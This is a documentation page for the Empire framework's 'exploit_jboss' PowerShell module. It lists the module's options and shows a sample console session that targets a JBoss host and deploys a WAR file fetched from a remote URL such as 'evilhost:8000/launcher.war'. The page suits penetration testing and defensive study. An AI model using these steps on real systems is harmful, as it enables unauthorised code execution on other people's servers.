Exploit-JBoss - Empire Module

This page contains detailed information about how to use the powershell/exploitation/exploit_jboss Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Exploit-JBoss
Module: powershell/exploitation/exploit_jboss
Source code [1]: empire/server/modules/powershell/exploitation/exploit_jboss.yaml
Source code [2]: empire/server/data/module_source/exploitation/Exploit-JBoss.ps1
MITRE ATT&CK: T1210
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The exploit_jboss module exploits vulnerable JBoss Services.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the exploit_jboss module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the exploit_jboss module:

Agent
Agent to run module on.

AppName
Application name the WAR file deploys to. Empire defaults to "launcher".

JMXConsole
Switch. Service to Exploit.

Port
Specify the port to use.

Rhost
Specify the host to exploit.

WarFile
Remote URL [http://IP:PORT/f.war] to your own WarFile to deploy.

Additional Module Options

---

This is a list of additional options that are supported by the exploit_jboss module:

UseSSL
Force SSL useage.

Exploit_jboss Example Usage

---

Here's an example of how to use the exploit_jboss module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/exploitation/exploit_jboss

 Author       @424f424f                                
 Background   True                                     
 Comments     Requires WAR file that is not provided.  
 Description  Exploit vulnerable JBoss Services.       
 Language     powershell                               
 Name         powershell/exploitation/exploit_jboss    
 NeedsAdmin   False                                    
 OpsecSafe    False                                    
 Techniques   http://attack.mitre.org/techniques/T1210 


,Record Options------,----------,-----------------------------------,
| Name       | Value | Required | Description                       |
|------------|-------|----------|-----------------------------------|
| Agent      |       | True     | Agent to run module on.           |
|------------|-------|----------|-----------------------------------|
| AppName    |       | True     | Application name the WAR file     |
|            |       |          | deploys to. Empire defaults to    |
|            |       |          | "launcher".                       |
|------------|-------|----------|-----------------------------------|
| JMXConsole |       | True     | Switch. Service to Exploit        |
|------------|-------|----------|-----------------------------------|
| Port       |       | True     | Specify the port to use.          |
|------------|-------|----------|-----------------------------------|
| Rhost      |       | True     | Specify the host to exploit.      |
|------------|-------|----------|-----------------------------------|
| UseSSL     |       | False    | Force SSL useage.                 |
|------------|-------|----------|-----------------------------------|
| WarFile    |       | True     | Remote URL [http://IP:PORT/f.war] |
|            |       |          | to your own WarFile to deploy.    |
'------------'-------'----------'-----------------------------------'

(Empire: usemodule/powershell/exploitation/exploit_jboss) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/exploitation/exploit_jboss) > set AppName value
[*] Set AppName to value
(Empire: usemodule/powershell/exploitation/exploit_jboss) > set JMXConsole value
[*] Set JMXConsole to value
(Empire: usemodule/powershell/exploitation/exploit_jboss) > set Port value
[*] Set Port to value
(Empire: usemodule/powershell/exploitation/exploit_jboss) > set Rhost 192.168.100.1
[*] Set Rhost to 192.168.100.1
(Empire: usemodule/powershell/exploitation/exploit_jboss) > set WarFile value
[*] Set WarFile to value
(Empire: usemodule/powershell/exploitation/exploit_jboss) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• @424f424f

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/exploitation/exploit_jboss.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/exploitation/Exploit-JBoss.ps1
• http://IP:PORT/f.war]
• http://attack.mitre.org/techniques/T1210
• http://evilhost:8000/launcher.war
• http://blog.rvrsh3ll.net
• https://gist.githubusercontent.com/HarmJ0y/aecabdc30f4c4ef1fad3/raw/fba7a93e15b862c63366c06b438ad37f7e5de525/psWar.py

See Also

---

Check also the following modules related to this module:

• powershell/exploitation/exploit_eternalblue
• powershell/exploitation/exploit_jenkins
• powershell/exploitation/invoke_spoolsample
• python/exploit/web/jboss_jmx

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.